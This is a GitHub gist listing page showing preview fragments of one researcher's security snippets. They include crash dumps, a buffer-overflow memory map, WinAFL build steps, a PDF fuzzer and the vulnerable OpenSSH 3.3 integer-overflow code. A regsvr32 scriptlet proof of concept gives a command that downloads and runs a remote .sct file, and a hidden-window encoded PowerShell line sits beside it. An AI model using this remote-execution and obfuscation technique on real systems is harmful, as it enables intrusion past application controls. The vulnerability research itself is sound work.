SkyBulk
/ RegSvr32.sct
Created
May 26, 2019 04:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll --> | |
| <!-- .sct files when downloaded, are executed from a path like this --> | |
| <!-- Please Note, file extenstion does not matter --> | |
| <!-- Though, the name and extension are arbitary.. --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -NoP -sta -NonI -W hidden -Enc QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBJACAAYQBtACAAYgBlAGkAbgBnACAAZQB4AGUAYwB1AHQAZQBkACAAZgByAG8AbQAgAHQAaABlACAAbQBlAG0AbwByAHkAIABkAHUAaAAgACEAIQAnACkA |
SkyBulk
/ gist:7a969e8854730d90f0c91929e41dc87f
Created
July 13, 2019 01:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Table of Contents | |
| 0. Testing Environment | |
| 0.1 Testing Environment | |
| 1. Software Vulnerability Review |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0:005> r | |
| eax=00000000 ebx=008adff0 ecx=008f00a7 edx=00000000 esi=02d8bb70 edi=00000000 | |
| eip=7157b68f esp=02d8bb44 ebp=02d8bb5c iopl=0 nv up ei pl zr na pe nc | |
| cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 | |
| mshtml!CElement::Doc+0x2: | |
| 7157b68f 8b5070 mov edx,dword ptr [eax+70h] ds:002b:00000070=???????? | |
| 0:005> u mshtml!CElement::Doc | |
| mshtml!CElement::Doc: | |
| 7157b68d 8b01 mov eax,dword ptr [ecx] |
SkyBulk
/ memory map
Last active
August 14, 2019 13:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0141E388 41414141 AAAA `<----------- ESP starts here` | |
| 0141E38C 41414141 AAAA | |
| 0141E390 41414141 AAAA | |
| 0141E394 41414141 AAAA | |
| 0141E398 41414141 AAAA | |
| 0141E39C 41414141 AAAA | |
| 0141E3A0 41414141 AAAA | |
| 0141E3A4 41414141 AAAA | |
| 0141E3A8 41414141 AAAA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from capstone import * | |
| shellcode = "\x00\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
| shellcode += "\x01\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
| shellcode += "\x02\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
| shellcode += "\x03\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
| shellcode += "\x04\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
| shellcode += "\x05\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
| shellcode += "\x06\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
| shellcode += "\x07\x48\x8B\x01\xC3\xC3\xC3\xC3" |
SkyBulk
/ project.py
Created
September 21, 2019 21:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AutoComplete | |
| class AutoComplete() :3 | |
| def __init__() :5 | |
| def complete() :8 | |
| def complete() :20 | |
| commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| how it was compiled | |
| git clone https://github.com/googleprojectzero/winafl.git | |
| git submodule update --init --recursive | |
| mkdir build32 | |
| cd build32 | |
| cmake .. -DDynamoRIO_DIR=C:\Users\blackleitus\Desktop\DynamoRIO-Windows-7.1.0-1\cmake -DINTELPT=1 | |
| cmake --build . --config Release | |
| # crash at the moment of run this commmand |
SkyBulk
/ pdf_fuzz.py
Created
October 30, 2019 05:42
— forked from kedarbellare/pdf_fuzz.py
PDF Fuzzer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| file_list = ["10.1.1.111.1781.pdf", "10.1.1.111.5264.pdf", "10.1.1.39.1596.pdf", "10.1.1.41.8589.pdf", "10.1.1.42.5619.pdf"] | |
| apps = [ | |
| "/Applications/Adobe Reader 9/Adobe Reader.app/Contents/MacOS/AdobeReader", | |
| "/Applications/Adobe Reader.app/Contents/MacOS/AdobeReader", | |
| "/Applications/Preview.app/Contents/MacOS/Preview"] | |
| fuzz_output = "fuzz.pdf" | |
| FuzzFactor = 250 |
SkyBulk
/ OpenSSH_3.3_integer_overflow.c
Created
January 23, 2020 18:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nresp = packet_get_int(); | |
| if (nresp > 0) { | |
| response = xmalloc(nresp*sizeof(char*)); | |
| for (i = 0; i < nresp; i++) | |
| response[i] = packet_get_string(NULL); | |
| } |
OlderNewer